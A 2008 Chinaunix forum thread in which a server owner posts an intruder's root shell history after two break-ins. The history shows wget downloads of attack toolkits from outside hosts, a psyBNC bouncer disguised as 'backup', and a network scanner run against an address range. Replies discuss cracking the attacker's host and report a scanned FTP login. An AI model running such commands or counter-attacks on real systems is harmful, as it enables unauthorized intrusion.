免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 5053 | 回复: 8
打印 上一主题 下一主题

放个主机到外网,放了两天被黑两次 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-12-12 12:44 |只看该作者 |倒序浏览
第一次查到来源IP说是广西的,第二次是美国。\r\n\r\n第一次把系统弄的彻底起不来,第二次把所有用户密码都改掉了...\r\n\r\n幸好,还有一个会话从昨晚持续到现在,是root登录的,history查看到他们的动作:\r\n\r\n 576  wget nasuc.d.am/scan/neW.jpg\r\n  577  wget nasuc.do.am/scan/neW.jpg\r\n  578  ftp 208.100.61.2\r\n  579  ssh test@203.244.154.57 \r\n  580  ls\r\n  581  tar xzvf\r\n  582  ccd /tmp\r\n  583  ls\r\n  584  cd /tmp\r\n  585  ls\r\n  586  tar xzvf belea.tgz\r\n  587  w\r\n  588  ls\r\n  589  ls\r\n  590  cat /proc/cpuinfo\r\n  591  w\r\n  592  ls\r\n  593  passwd\r\n  594  wget\r\n  595  wget ideo.go.ro/psy6667.tgz\r\n  596  cd\r\n  597  w\r\n  598  ls\r\n  599  w\r\n  600  uname -a\r\n  601  tar xzvf psy6667.tgz\r\n  602  cd psybnc\r\n  603  chmod +x psybnc\r\n  604  mv psybnc backup\r\n  605  ./backup\r\n  606  cd\r\n  607  ls\r\n  608  cat /p[roc/cpuinfo\r\n  609  cat /proc/cpuinfo\r\n  610  cd\r\n  611  cd\r\n  612  ls\r\n  613   tar xzvf unixcod.tar.gz\r\n  614  cd unixcod\r\n  615  ./unix 218.249\r\n\r\n\r\n唉,这些人,在搞什么呢?

论坛徽章:
0
2 [报告]
发表于 2008-12-12 19:51 |只看该作者
nasuc.do.am---208.100.61.2,这个网站,\r\n21、22、25端口都是开放的,ssh端口有个test帐号,谁有办法破到密码? :right: \r\n:right:

论坛徽章:
0
3 [报告]
发表于 2008-12-12 20:57 |只看该作者
ideo.go.ro\r\n\r\n扫出一个FTP帐号密码,可惜,没用啊 :shit:

论坛徽章:
0
4 [报告]
发表于 2008-12-12 21:17 |只看该作者
原帖由 LivePUB 于 2008-12-12 19:51 发表 \r\nnasuc.do.am---208.100.61.2,这个网站,\r\n21、22、25端口都是开放的,ssh端口有个test帐号,谁有办法破到密码? :right: \r\n:right:
\r\n\r\n\r\n这个,事实上是属于美国一家提供网站空间的服务商。

论坛徽章:
0
5 [报告]
发表于 2008-12-12 21:43 |只看该作者
原帖由 你好吃了吗 于 2008-12-12 19:25 发表 \r\n晕死~~现在的病毒太猖狂,一定要装个诺顿什么的,恶意网站都能自动拦截的!还有就是一定要养成良好的上网习惯
\r\n冒昧的问下\r\n\r\n你买了诺顿的多少股票\r\n\r\n你所以的回复都夸它好,其用意何在?

论坛徽章:
0
6 [报告]
发表于 2008-12-12 22:20 |只看该作者

回复 6 楼 grjboy30的帖子

:bang: \r\n\r\n原来他是个托儿啊,真没看出来~~

论坛徽章:
0
7 [报告]
发表于 2009-01-05 11:53 |只看该作者
还能行不了啊, 托都上来了。 :wuyu:

论坛徽章:
0
8 [报告]
发表于 2009-02-25 13:07 |只看该作者
:bang: \r\n\r\n原来他是个托儿啊,真没看出来~~\r\nLivePUB 发表于 2008-12-12 22:20
\r\n\r\n他已经是个死人了。

论坛徽章:
0
9 [报告]
发表于 2009-02-25 18:29 |只看该作者
新建一网络工程师QQ群   58506017  ,期待你的加入~~~~~~~~
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP